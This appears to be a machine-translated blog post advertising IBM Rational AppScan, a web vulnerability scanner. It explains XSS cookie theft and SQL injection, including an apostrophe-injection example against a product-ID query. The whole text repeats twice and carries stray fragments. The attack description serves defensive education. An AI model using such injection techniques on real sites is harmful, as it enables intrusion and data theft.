IBM Rational AppScan will give hackers a rebuff
Testing applications is always difficult. Time, the forces that can do this — everything turns into tasks that need to be solved. And especially testing for vulnerability from hacker attacks, because not everyone knows what digital criminals use. In order to solve this problem, IBM created Rational AppScan, a program that automatically scans web applications for vulnerabilities and generates reports on test results.
Like all sorts of other things, hacking activities are also examined and counted. At the same time, the figures sometimes turn out to be different from those that exist in a professional environment. For example, in Gartner, it was considered that 75% of all attacks were targets of web applications. And that two-thirds of all applications are vulnerable. What, in fact, means that if you do not have your own security specialist, you will be hacked whenever you want, even if you use a firewall and check it regularly. The most popular means of attack turned out to be XSS and SQL injection, in front of which all server-level protection turns out to be useless: the attack is at the application level. In addition, inasmuch as the people have learned to protect the server and spend money on it, but with applications it is not so, then this is the value of 75%. Plus, safety testing is carried out at the end of the project’s delivery, and the “residual principle” is often extended to it, which also affects the result.
Consider the two most popular technologies: XSS and SQL injection.
The essence of the XSS (cross-site scripting) technology is to provide the victim with a javascript in the address bar. For example, send an e-mail on the corporate template of the bank, which the victim uses. Some of the words will be highlighted as a link, and the user is unlikely to pay attention to what is contained in the address after the domain name, if he looks at the address at all.
')
And then this javascript gets access to the security context of the site, because it was called inside it. And this means that in this way you can steal cookies, track all actions in the browser from the moment the script is run, forward the user to a fraudulent site, and even completely modify the content of the pages you are viewing.
Not surprisingly, this is the most popular technology to date. But SQL injections are not far behind. The principle of their operation, as it is easy to understand from the name, is the sending of SQL commands along with the data entered by the user. Very often, a programmer, through laziness or ignorance, neglects to check the sent data, and inserts it straight into the generated SQL query as it came. And if the attacker sends the SQL commands there, they will be executed, as they will go straight to the request that is automatically generated by a low-quality program.
The simplest example: a user clicks on a link with a product name that contains the digital ID of this product in the address bar. The script on the site substitutes this ID in the request template directly from the address bar, and executes it. SQL is an open, widely used language, and it’s easy to guess what the template looks like is something like SELECT * FROM products WHERE id = '...', where instead of the ellipsis there is a number from the address bar. It is enough to write an apostrophe first, so that an empty value is transferred to id, and continue to write your own commands. The trick is simple, but popular.
IBM Rational AppScan uses the approach to the application as a “black box”. First, he examines the web application and builds his own site model. Based on these results, it determines attack vectors based on the selected testing policy. It then starts sending various HTTP requests that match this policy and analyzes the HTTP responses.
What do we get as a result? A powerful and understandable tool that can automatically scan and test web applications for typical vulnerabilities, including services and javascript, fix them (including giving a list of actions to close detected vulnerabilities if this cannot be done automatically). IBM Rational AppScan integrates seamlessly with other testing tools, and can share time-sharing and reporting with them. In total, it provides more than 40 ready-made reports for compliance with safety requirements.
A very important feature of IBM Rational AppScan is that it does not require expensive security specialists in the team, as it provides very detailed reports and instructions. For example, each vulnerability is provided with an accessible description of how it works and how it is dangerous, including through the use of video clips. That is, the guys from IBM approached the educational component with great responsibility.
And they can be understood: the higher the average computer literacy, the less problems we have, IT workers. Knowledge is the most effective way to protect information. This application is called Rational is not just for beautiful words.
Curious statistics.
Like all sorts of other things, hacking activities are also examined and counted. At the same time, the figures sometimes turn out to be different from those that exist in a professional environment. For example, in Gartner, it was considered that 75% of all attacks were targets of web applications. And that two-thirds of all applications are vulnerable. What, in fact, means that if you do not have your own security specialist, you will be hacked whenever you want, even if you use a firewall and check it regularly. The most popular means of attack turned out to be XSS and SQL injection, in front of which all server-level protection turns out to be useless: the attack is at the application level. In addition, inasmuch as the people have learned to protect the server and spend money on it, but with applications it is not so, then this is the value of 75%. Plus, safety testing is carried out at the end of the project’s delivery, and the “residual principle” is often extended to it, which also affects the result.
As it happens
Consider the two most popular technologies: XSS and SQL injection.
The essence of the XSS (cross-site scripting) technology is to provide the victim with a javascript in the address bar. For example, send an e-mail on the corporate template of the bank, which the victim uses. Some of the words will be highlighted as a link, and the user is unlikely to pay attention to what is contained in the address after the domain name, if he looks at the address at all.
')
And then this javascript gets access to the security context of the site, because it was called inside it. And this means that in this way you can steal cookies, track all actions in the browser from the moment the script is run, forward the user to a fraudulent site, and even completely modify the content of the pages you are viewing.
Not surprisingly, this is the most popular technology to date. But SQL injections are not far behind. The principle of their operation, as it is easy to understand from the name, is the sending of SQL commands along with the data entered by the user. Very often, a programmer, through laziness or ignorance, neglects to check the sent data, and inserts it straight into the generated SQL query as it came. And if the attacker sends the SQL commands there, they will be executed, as they will go straight to the request that is automatically generated by a low-quality program.
The simplest example: a user clicks on a link with a product name that contains the digital ID of this product in the address bar. The script on the site substitutes this ID in the request template directly from the address bar, and executes it. SQL is an open, widely used language, and it’s easy to guess what the template looks like is something like SELECT * FROM products WHERE id = '...', where instead of the ellipsis there is a number from the address bar. It is enough to write an apostrophe first, so that an empty value is transferred to id, and continue to write your own commands. The trick is simple, but popular.
How does IBM Rational AppScan handle this?
IBM Rational AppScan uses the approach to the application as a “black box”. First, he examines the web application and builds his own site model. Based on these results, it determines attack vectors based on the selected testing policy. It then starts sending various HTTP requests that match this policy and analyzes the HTTP responses.
What do we get as a result? A powerful and understandable tool that can automatically scan and test web applications for typical vulnerabilities, including services and javascript, fix them (including giving a list of actions to close detected vulnerabilities if this cannot be done automatically). IBM Rational AppScan integrates seamlessly with other testing tools, and can share time-sharing and reporting with them. In total, it provides more than 40 ready-made reports for compliance with safety requirements.
A very important feature of IBM Rational AppScan is that it does not require expensive security specialists in the team, as it provides very detailed reports and instructions. For example, each vulnerability is provided with an accessible description of how it works and how it is dangerous, including through the use of video clips. That is, the guys from IBM approached the educational component with great responsibility.
And they can be understood: the higher the average computer literacy, the less problems we have, IT workers. Knowledge is the most effective way to protect information. This application is called Rational is not just for beautiful words.
Source: https://habr.com/ru/post/69143/
All Articles